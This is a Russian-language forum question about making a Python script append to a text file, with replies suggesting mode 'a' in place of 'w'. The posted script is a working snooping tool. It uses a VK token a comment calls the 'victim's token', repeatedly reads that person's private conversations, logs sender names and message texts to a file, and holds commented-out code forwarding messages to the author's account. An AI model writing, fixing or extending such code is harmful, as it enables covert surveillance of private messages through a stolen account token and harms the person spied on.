# Как добавить строку в файл

Tags: python, python-3.x, vkontakte-api

При использовании моего кода,в текстовик каждое собщение добавляется, но стирается старое, как пофиксить?
код:

```
print("""
Working.
R3NOVA-VKANNON-GOD
#FuckAll.Everything. 
by Tripl_color vk.com/Tripl_color""")
import vk_requests
import vk_api
import time
import random
from flexx import flx
import sqlite3 as sql
 
#api = vk_requests.create_api(
    #service_token="123")  # токен группы
vk = vk_api.VkApi(
    token="123")  # токен жертвы
tripl = 472165736
vk._auth_token()
 
 
while True:
    try:
        messages = vk.method("messages.getConversations", {"offset": 0, "count": 20, "filter": "all"})
        if messages["count"] >= 1:
            id = messages["items"][0]["last_message"]["from_id"]
            body = messages["items"][0]["last_message"]["text"]
            user_info = vk.method("users.get", {"user_ids": id, "fields": "first_name"})
 
            user_name = user_info[0]["first_name"]
 
            #
            #  _____   ____
            # |  __ \ |  _ \
            # | |  | || |_) |
            # | |  | ||  _ <
            # | |__| || |_) |
            # |_____/ |____/
 
            handle = open("алина.txt", "w")
            handle.write(user_name + '\n')
            handle.write(body + '\n')
            handle.close()
            # print(api.messages.send(peer_id= tripl, message= body,random_id= random.randint(1, 2147483647)))
            # print(api.messages.send(peer_id=tripl,
            #                        message= id,
            #                        random_id=random.randint(1, 2147483647)))
 
 
 
    except Exception as E:
        time.sleep(1)
```

Comment: Используйте `open("filename", "a")` вместо `open("filename", "w")` Режим `w` стирает старое содержимое файла и пишет новые данные, режим "а" дописывает в уже **существующий** файл

Comment: Так у меня вообще ничего не работает

Comment: Будьте конкретнее... Ничего не работает - можно интерпретировать по разному. Вот вам ссылка на документацию https://docs.python.org/3/library/functions.html#open если не верите

Answer (score 0):

Как я понимаю вы создаёте новый текстовой файл и записываете в него. Предлагаю вам вместо `handle = open("алина.txt", "w")` использовать вот такую конструкцию:

`handle = open("алина.txt", "a")`

Но предварительно вам нужно бы создать сам этот файл "алина.txt" и открыть его разок.